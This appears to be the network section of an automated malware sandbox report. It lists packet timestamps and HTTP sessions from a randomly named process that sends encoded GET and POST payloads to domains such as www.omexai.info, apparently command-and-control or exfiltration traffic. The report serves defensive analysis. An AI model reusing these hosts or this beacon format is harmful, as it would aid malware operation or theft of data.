                                                        Sep 18, 2024 16:19:30.068375111 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.688004971 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.688083887 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.690958977 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:31.568413973 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.586378098 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.591433048 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:32.595015049 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.606756926 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.611654043 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214298964 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214380026 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214822054 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:34.115153074 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.134527922 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.139621019 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.139744043 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.149058104 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.153907061 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.154004097 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871685982 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871716976 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871774912 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871778965 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.871818066 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:36.662075043 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.680315971 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.685307026 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:37.685390949 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.691410065 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.696289062 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348726988 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348876953 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348984957 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:38.351818085 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:38.356750965 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:43.384386063 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.389367104 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.389440060 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.398394108 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.403422117 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.847429037 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.847493887 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:44.912035942 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:44.917315006 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:45.930282116 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.935204029 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:45.935408115 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.944848061 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.949695110 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:46.397588968 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:46.397677898 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:47.462546110 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:47.467430115 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.476866007 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.481949091 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.482036114 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.491103888 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.496100903 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.496128082 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.945964098 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.946029902 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:50.006422043 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:50.011456966 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.024188042 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.029234886 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.029321909 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.036479950 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.044487953 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502353907 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502444983 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502607107 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.504837036 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.510854959 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:20:11.017110109 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.022069931 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.022146940 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.031505108 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.036432028 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912388086 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912781000 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912872076 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:12.537194967 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.555135965 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.618979931 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:13.619347095 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.630875111 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.664886951 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.670156956 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.674838066 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.674892902 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:15.130932093 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.153265953 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.324650049 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:16.324779034 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.333942890 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.340408087 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:16.340435028 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.275325060 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.276339054 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.276408911 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:17.849606037 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.867784023 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.904093027 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:18.904182911 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.911250114 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.941479921 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922276974 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922617912 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922705889 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:19.925065041 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:19.945262909 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:26.211992979 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.235001087 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.235286951 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.244155884 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.249125957 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.989557028 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.995934963 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.996004105 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:27.756520987 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.774463892 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.780822039 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:28.780905008 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.795279980 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.800204039 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401736975 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401801109 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401854038 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:30.302731991 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.322356939 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.608978987 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:31.609428883 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.624845982 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.630877972 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:31.632890940 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376797915 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376816034 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376830101 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.377082109 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:33.130886078 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.150558949 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.155520916 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.155930996 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.163423061 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.168348074 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.793801069 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796257019 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796273947 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796370983 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.796401978 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.802194118 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.810837030 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:39.928849936 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.933770895 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:39.933927059 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.942718983 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.947647095 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:41.459513903 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:41.464648962 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:41.467602968 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.477899075 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.483023882 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:42.483093977 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.499346972 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.510060072 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:44.006797075 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:44.012448072 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:44.012590885 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.025206089 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.030112028 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:45.030199051 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.041285038 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.046180010 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:45.046451092 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:46.552932024 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:46.784935951 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:46.785026073 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.571820021 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.576678038 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:47.576941013 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.583436012 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.588602066 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.478960991 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.479137897 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.479195118 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:48.485137939 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:48.490011930 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:53.546108007 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.551110983 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:53.552957058 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.578528881 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.584059000 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781192064 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781241894 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781275034 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781313896 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:54.781727076 CEST8053659188.114.97.3192.168.2.5
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        0 | 192.168.2.5 | 53614 | 148.72.152.174 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:05.061590910 CEST | 564 | OUT | GET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:05.577068090 CEST | 547 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:18:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.5 | 53615 | 3.33.130.190 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:20.662254095 CEST | 813 | OUT | POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.5 | 53616 | 3.33.130.190 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:23.280239105 CEST | 833 | OUT | POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g
                                                        Sep 18, 2024 16:18:23.584000111 CEST | 833 | OUT | POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.5 | 53617 | 3.33.130.190 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:25.836359978 CEST | 1850 | OUT | POST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nUtynDuQd7k3BUqb5wzpzN5c/RWrmw9Ba1NzZImuHvpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0++h6GR2JoPIig2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1a68zjTuimtQRtow0BW5loSkJjGTYtRL5+RyTnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA4FesR/uHV5UQdX8k6trTz/hv91eZxL9c2ce2gOl3ay7dKbWdEdThS9jAU+fHKBbuccgmqFOb54wLoKfmFT+RSaLh1o9noqAu3/AiKdwR1a/Qf3pzDEfaK0uTnmCh4mwS8u+JSYoYHYbrfeqx/MEWAUDWD3dQD9jyvt04YpzPDAOtn2ayckXBJy+Q2f1MzvQHh05nlEHbiNgeO9zFfWSXtazk3kZWJ9FGg6ko3hkUkiuaizzt8ODK5mToNovOLZ7oSlx9XEe7g3hr6GYGGYIqMpo2aq+lvmpuAi9rdMdtkC62lvo10tq4yA32DiOMu5T68NlJMWpv/pXlui8ZfnmoTSlNm5KsFrPCuAEb1Y/9klKVJVuWANAL5a5v6+rKKIzn91jgPGSR6/xg8L51sIn7gqNG5Wngq0GfNfnr/2XDtMyxX9m6phi4a3PcMI5cRidD8IdsMQm56MUPf7/6zJTqaq+61GIMceq0cLjjOcm1FCfZeGykvrH69J/eO2iNjp6oqocVCuRBMOmiW [TRUNCATED]


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.5 | 53618 | 3.33.130.190 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:28.402077913 CEST | 560 | OUT | GET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:29.914180040 CEST | 410 | IN | HTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:18:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.5 | 53619 | 172.191.244.62 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:18:35.423499107 CEST | 813 | OUT | POST /fpzw/ HTTP/1.1
